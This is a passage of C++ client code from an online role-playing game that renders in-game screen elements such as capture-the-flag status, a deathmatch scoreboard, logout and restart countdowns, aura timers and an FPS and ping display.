		PutString(10, 180, G_cTxt, RGB(255, 255, 255));
		wsprintf(G_cTxt, "Elvine death toll : %d", m_iHeldenianElvineDead);
		PutString(10, 200, G_cTxt, RGB(255, 255, 255));
		wsprintf(G_cTxt, "Aresden's rest building number : %d", m_iHeldenianAresdenLeftTower);
		PutString(10, 220, G_cTxt, RGB(255, 255, 255));
		wsprintf(G_cTxt, "Elvine's rest building number : %d", m_iHeldenianElvineLeftTower);
		PutString(10, 240, G_cTxt, RGB(255, 255, 255));
	}

	//50Cent - Capture The Flag
	if (iUpdateRet != 0 && m_bIsCTFMode)
	{
		m_pSprite[DEF_SPRID_ITEMGROUND_PIVOTPOINT + 6]->PutSpriteFast(10, 200, 57, dwTime);
		wsprintf(G_cTxt, "%d", m_sElvineFlagCount);
		PutString(20, 200, G_cTxt, RGB(255, 255, 255));
		if (m_bIsElvineFlagStatus) PutString(30, 200, "(protected)", RGB(0, 255, 0));
		else PutString(30, 200, "(captured!)", RGB(255, 0, 0));

		m_pSprite[DEF_SPRID_ITEMGROUND_PIVOTPOINT + 6]->PutSpriteFast(10, 160, 56, dwTime);
		wsprintf(G_cTxt, "%d", m_sAresdenFlagCount);
		PutString(20, 160, G_cTxt, RGB(255, 255, 255));
		if (m_bIsAresdenFlagStatus) PutString(30, 160, "(protected)", RGB(0, 255, 0));
		else PutString(30, 160, "(captured!)", RGB(255, 0, 0));

		if (m_bIsElvineFlagStatus) if (memcmp(m_cCurLocation, "elvine", 6) == 0) m_pSprite[DEF_SPRID_ITEMDYNAMIC_PIVOTPOINT + 2]->PutSpriteFast(148 * 32 - m_sViewPointX, 130 * 32 - m_sViewPointY, 5, dwTime); //elvine flag
		else if (memcmp(m_cCurLocation, "elvine", 6) == 0) m_pSprite[DEF_SPRID_ITEMDYNAMIC_PIVOTPOINT + 2]->PutTransSprite2(148 * 32 - m_sViewPointX, 130 * 32 - m_sViewPointY, 5, dwTime); //elvine flag

		if (m_bIsAresdenFlagStatus) if (memcmp(m_cCurLocation, "aresden", 7) == 0) m_pSprite[DEF_SPRID_ITEMDYNAMIC_PIVOTPOINT + 2]->PutSpriteFast(148 * 32 - m_sViewPointX, 126 * 32 - m_sViewPointY, 1, dwTime); //aresden flag
		else if (memcmp(m_cCurLocation, "aresden", 7) == 0) m_pSprite[DEF_SPRID_ITEMDYNAMIC_PIVOTPOINT + 2]->PutTransSprite2(148 * 32 - m_sViewPointX, 126 * 32 - m_sViewPointY, 1, dwTime); //aresden flag
	}

	DrawTopMsg();

#ifdef _DEBUG
	wsprintf(G_cTxt, "(%d,%d)", msX, msY);
	PutString(msX, msY + 30, G_cTxt, RGB(255, 255, 255));
#endif

	// LogOut process
	if (m_cLogOutCount > 0)
	{
		if ((dwTime - m_dwLogOutCountTime) > 1000)
		{
			m_cLogOutCount--;
			m_dwLogOutCountTime = dwTime;
			wsprintf(G_cTxt, UPDATE_SCREEN_ONGAME13, m_cLogOutCount);
			AddEventList(G_cTxt, 10);
		}

		//50Cent - No Logout si estas en movimiento
		if ((m_cCommand != DEF_OBJECTSTOP) && (m_bForceDisconn == FALSE))
		{
			m_cLogOutCount = -1;
			AddEventList("You can't logout while you are moving.", 10);
		}
	}

	// Logout
	else if (m_cLogOutCount == 0)
	{
		delete m_pGSock;
		m_pGSock = NULL;
		m_bEscPressed = FALSE;

		PlaySound('E', 14, 5);
		if (m_bSoundFlag) m_pESound[38]->bStop();
		if ((m_bSoundFlag) && (m_bMusicStat == TRUE))
		{
			StopBGM();	// Snoopy: mp3 support
			if (m_pBGM != NULL) m_pBGM->bStop();
		}
		if (strlen(G_cCmdLineTokenA) != 0)
			ChangeGameMode(DEF_GAMEMODE_ONQUIT);
		else ChangeGameMode(DEF_GAMEMODE_ONMAINMENU);
		iDGKill1 = iDGKill2 = iDGKill3 = iDGKill4 = iDGKill5 = iDGKill6 = iDGKill7 = iDGKill8 = iDGKill9 = iDGKill10 = 0;
		return;
	}

	// Restart Process
	if (m_cRestartCount > 0)
	{
		if ((dwTime - m_dwRestartCountTime) > 1000)
		{
			m_cRestartCount--;
			m_dwRestartCountTime = dwTime;
			wsprintf(G_cTxt, UPDATE_SCREEN_ONGAME14, m_cRestartCount); // "Restarting game...%d"
			AddEventList(G_cTxt, 10);
		}
	}
	// Restart
	else if (m_cRestartCount == 0)
	{
		m_cRestartCount = -1;
		bSendCommand(MSGID_REQUEST_RESTART, NULL, NULL, NULL, NULL, NULL, NULL);
		return;
	}

	if (dwTime - dwEKNotifyTime < 10000)
	{
		switch (m_sPlayerType) {
		case 1:
		case 2:
		case 3:
			PlaySound('C', 21, 0);
			break;

		case 4:
		case 5:
		case 6:
			PlaySound('C', 22, 0);
			break;
		}
		PutString_SprFont3(355, 205, "ENEMY KILLED!", 200, 250, 2);
		m_Misc.ReplaceString(cEKNotifySubject, '_', ' ');

#ifdef RES_HIGH
		PutString_SprFont3(400 - ((strlen(cEKNotifySubject) * 7) / 2), 220, cEKNotifySubject, 2, 200, 250);
#else
		PutString_SprFont3(320 - ((strlen(cEKNotifySubject) * 7) / 2), 215, cEKNotifySubject, 2, 200, 250);
#endif	
	}

	if (m_bIsObserverMode == TRUE)
	{
		m_DDraw.PutPixel(msX, msY, 255, 255, 255);
		m_DDraw.PutPixel(msX + 1, msY, 255, 255, 255);
		m_DDraw.PutPixel(msX - 1, msY, 255, 255, 255);
		m_DDraw.PutPixel(msX, msY + 1, 255, 255, 255);
		m_DDraw.PutPixel(msX, msY - 1, 255, 255, 255);
	}
	else m_pSprite[DEF_SPRID_MOUSECURSOR]->PutSpriteFast(msX, msY, m_stMCursor.sCursorFrame, dwTime);


	// centuu - si esta en Arena 1 desactiva el mapa para mostrar las auras arriba
	if (memcmp(m_cCurLocation, "fightzone1", 10) == 0)
	{
		if (m_bIsDialogEnabled[9]) m_bIsDialogEnabled[9] = FALSE;

		//MORLA2.2 - Deathmach Game
		if (bDeathmatch)
		{
			wsprintf(G_cTxt, "Name");
			PutAlignedString(500, 535, 104 + resi, G_cTxt, 255, 120, 120);
			wsprintf(G_cTxt, "Kills");
			PutAlignedString(565, 575, 104 + resi, G_cTxt, 255, 120, 120);
			wsprintf(G_cTxt, "Deaths");
			PutAlignedString(600, 610, 104 + resi, G_cTxt, 255, 120, 120);
			if (iDGKill1 != 0) {
				wsprintf(G_cTxt, "%s", cDGName1);
				PutAlignedString(500, 535, 104 + 14 + resi, G_cTxt, 255, 255, 0);
				wsprintf(G_cTxt, "%d", iDGKill1);
				PutAlignedString(565, 575, 104 + 14 + resi, G_cTxt, 180, 180, 180);
				wsprintf(G_cTxt, "%d", iDGDeath1);
				PutAlignedString(600, 610, 104 + 14 + resi, G_cTxt, 180, 180, 180);
			}

			if (iDGKill2 != 0) {
				wsprintf(G_cTxt, "%s", cDGName2);
				PutAlignedString(500, 535, 104 + 14 * 2 + resi, G_cTxt, 180, 180, 180);
				wsprintf(G_cTxt, "%d", iDGKill2);
				PutAlignedString(565, 575, 104 + 14 * 2 + resi, G_cTxt, 180, 180, 180);
				wsprintf(G_cTxt, "%d", iDGDeath2);
				PutAlignedString(600, 610, 104 + 14 * 2 + resi, G_cTxt, 180, 180, 180);
			}

			if (iDGKill3 != 0) {
				wsprintf(G_cTxt, "%s", cDGName3);
				PutAlignedString(500, 535, 104 + 14 * 3 + resi, G_cTxt, 180, 180, 180);
				wsprintf(G_cTxt, "%d", iDGKill3);
				PutAlignedString(565, 575, 104 + 14 * 3 + resi, G_cTxt, 180, 180, 180);
				wsprintf(G_cTxt, "%d", iDGDeath3);
				PutAlignedString(600, 610, 104 + 14 * 3 + resi, G_cTxt, 180, 180, 180);
			}

			if (iDGKill4 != 0) {
				wsprintf(G_cTxt, "%s", cDGName4);
				PutAlignedString(500, 535, 104 + 14 * 4 + resi, G_cTxt, 180, 180, 180);
				wsprintf(G_cTxt, "%d", iDGKill4);
				PutAlignedString(565, 575, 104 + 14 * 4 + resi, G_cTxt, 180, 180, 180);
				wsprintf(G_cTxt, "%d", iDGDeath4);
				PutAlignedString(600, 610, 104 + 14 * 4 + resi, G_cTxt, 180, 180, 180);
			}

			if (iDGKill5 != 0) {
				wsprintf(G_cTxt, "%s", cDGName5);
				PutAlignedString(500, 535, 104 + 14 * 5 + resi, G_cTxt, 180, 180, 180);
				wsprintf(G_cTxt, "%d", iDGKill5);
				PutAlignedString(565, 575, 104 + 14 * 5 + resi, G_cTxt, 180, 180, 180);
				wsprintf(G_cTxt, "%d", iDGDeath5);
				PutAlignedString(600, 610, 104 + 14 * 5 + resi, G_cTxt, 180, 180, 180);
			}

			if (m_bCtrlPressed)
			{
				if (iDGKill6 != 0) {
					wsprintf(G_cTxt, "%s", cDGName6);
					PutAlignedString(500, 535, 104 + 14 * 6 + resi, G_cTxt, 180, 180, 180);
					wsprintf(G_cTxt, "%d", iDGKill6);
					PutAlignedString(565, 575, 104 + 14 * 6 + resi, G_cTxt, 180, 180, 180);
					wsprintf(G_cTxt, "%d", iDGDeath6);
					PutAlignedString(600, 610, 104 + 14 * 6 + resi, G_cTxt, 180, 180, 180);
				}

				if (iDGKill7 != 0) {
					wsprintf(G_cTxt, "%s", cDGName7);
					PutAlignedString(500, 535, 104 + 14 * 7 + resi, G_cTxt, 180, 180, 180);
					wsprintf(G_cTxt, "%d", iDGKill7);
					PutAlignedString(565, 575, 104 + 14 * 7 + resi, G_cTxt, 180, 180, 180);
					wsprintf(G_cTxt, "%d", iDGDeath7);
					PutAlignedString(600, 610, 104 + 14 * 7 + resi, G_cTxt, 180, 180, 180);
				}

				if (iDGKill8 != 0) {
					wsprintf(G_cTxt, "%s", cDGName8);
					PutAlignedString(500, 535, 104 + 14 * 8 + resi, G_cTxt, 180, 180, 180);
					wsprintf(G_cTxt, "%d", iDGKill8);
					PutAlignedString(565, 575, 104 + 14 * 8 + resi, G_cTxt, 180, 180, 180);
					wsprintf(G_cTxt, "%d", iDGDeath8);
					PutAlignedString(600, 610, 104 + 14 * 8 + resi, G_cTxt, 180, 180, 180);
				}

				if (iDGKill9 != 0) {
					wsprintf(G_cTxt, "%s", cDGName9);
					PutAlignedString(500, 535, 104 + 14 * 9 + resi, G_cTxt, 180, 180, 180);
					wsprintf(G_cTxt, "%d", iDGKill9);
					PutAlignedString(565, 575, 104 + 14 * 9 + resi, G_cTxt, 180, 180, 180);
					wsprintf(G_cTxt, "%d", iDGDeath9);
					PutAlignedString(600, 610, 104 + 14 * 9 + resi, G_cTxt, 180, 180, 180);
				}

				if (iDGKill10 != 0) {
					wsprintf(G_cTxt, "%s", cDGName10);
					PutAlignedString(500, 535, 104 + 14 * 10 + resi, G_cTxt, 180, 180, 180);
					wsprintf(G_cTxt, "%d", iDGKill10);
					PutAlignedString(565, 575, 104 + 14 * 10 + resi, G_cTxt, 180, 180, 180);
					wsprintf(G_cTxt, "%d", iDGDeath10);
					PutAlignedString(600, 610, 104 + 14 * 10 + resi, G_cTxt, 180, 180, 180);
				}
			}
		}
	}

	// centu - cuando Polymorph = TRUE no puede correr
	if (m_bIsPolymorph) {
		if (m_bRunningMode) {
			m_bRunningMode = FALSE;
			AddEventList(NOTIFY_MSG_CONVERT_WALKING_MODE, 10);
			AddEventList("When you're Polymorphed you can't run!", 10);
		}
	}

	// centu - al estar sobrecargado no puede correr !
	if ((_iCalcTotalWeight() / 100) == (((m_iStr + m_iAngelicStr) * 5) + (m_iLevel + m_iMajesticLevel) * 5)) {
		if (m_bRunningMode) {
			m_bRunningMode = FALSE;
			AddEventList(NOTIFY_MSG_CONVERT_WALKING_MODE, 10);
			AddEventList("You're carrying too much to run!", 10);
		}
	}

	if (iUpdateRet == 0) m_sFrameCount++;
	else m_sFrameCount += 256;

	if (dwTime - m_dwFPStime > 500)
	{
		m_dwFPStime = dwTime;
		m_sFPS = m_sFrameCount >> 7;
		if (m_sFPS < 10) m_sFPS += 6;
		m_sFrameCount = 0;
	}

	// Tiempo de auras, coded by Centuu - MORLA - Editado para que ande mejor :P
	if (dwTime - m_dwAuraTime > 1000)
	{
		if (m_sZerk == 0) {
			m_sZerk = 0;
			bZerk = false;
		}
		else m_sZerk--;

		if (m_sInv == 0) {
			m_sInv = 0;
			bInv = false;
		}
		else m_sInv--;

		if (m_sPfm == 0) 
		{
			m_sPfm = 0;
			bPfm = false;
		}
		else m_sPfm--;

		if (m_sPfa == 0) {
			m_sPfa = 0;
			bPfa = false;
		}
		else m_sPfa--;

		if (m_sShield == 0) {
			m_sShield = 0;
			bShield = false;
		}
		else m_sShield--;

		m_dwAuraTime = dwTime;
	}

	if (iUpdateRet != 0)
	{
		if (m_bShowFPS)
		{
			wsprintf(G_cTxt, "FPS: %.3d", m_sFPS);
			PutString(10, 560, G_cTxt, RGB(255, 255, 255));
			wsprintf(G_cTxt, "PING: %.3d", m_iPing);
			if (m_iPing < 150) PutString(10, 575, G_cTxt, RGB(0, 255, 0));
			else if (m_iPing >= 150 && m_iPing < 500) PutString(10, 575, G_cTxt, RGB(255, 165, 0));
			else if (m_iPing >= 500) PutString(10, 575, G_cTxt, RGB(255, 0, 0));
			ZeroMemory(G_cTxt, sizeof(G_cTxt));
		}
		if (m_DDraw.iFlip() == DDERR_SURFACELOST) RestoreSprites();
	}

	// m_iPlayerStatus 0x000F
	iUpdateRet = m_pMapData->iObjectFrameCounter(m_cPlayerName, m_sViewPointX, m_sViewPointY);

	if ((bEffectFrameCounter() == TRUE) && (iUpdateRet == 0)) iUpdateRet = -1;
	if (iUpdateRet == 2)
	{
		m_bCommandAvailable = TRUE;
		m_dwCommandTime = 0;
	}
	CommandProcessor(msX, msY, ((sDivX + sPivotX) * 32 + sModX + msX - 17) / 32 + 1, ((sDivY + sPivotY) * 32 + sModY + msY - 17) / 32 + 1, cLB, cRB);

	m_sViewPointX = sVPXsave;
	m_sViewPointY = sVPYsave;

	if (iUpdateRet > 0) CalcViewPoint();

	if (m_bIsObserverMode)
	{
		if ((dwTime - m_dwObserverCamTime) > 25)
		{
			m_dwObserverCamTime = dwTime;
			CalcViewPoint();
			iUpdateRet = -1;
		}
	}

	if (iUpdateRet > 0)
	{
		if (m_bDrawFlagDir == FALSE)
		{
			m_iDrawFlag++;
			if (m_iDrawFlag >= 25)
			{
				m_iDrawFlag = 25;
				m_bDrawFlagDir = TRUE;
			}
		}
		else
		{
			m_iDrawFlag--;
			if (m_iDrawFlag < 0)
			{
				m_iDrawFlag = 0;
				m_bDrawFlagDir = FALSE;
			}
		}
	}
	// iUpdateRet
}
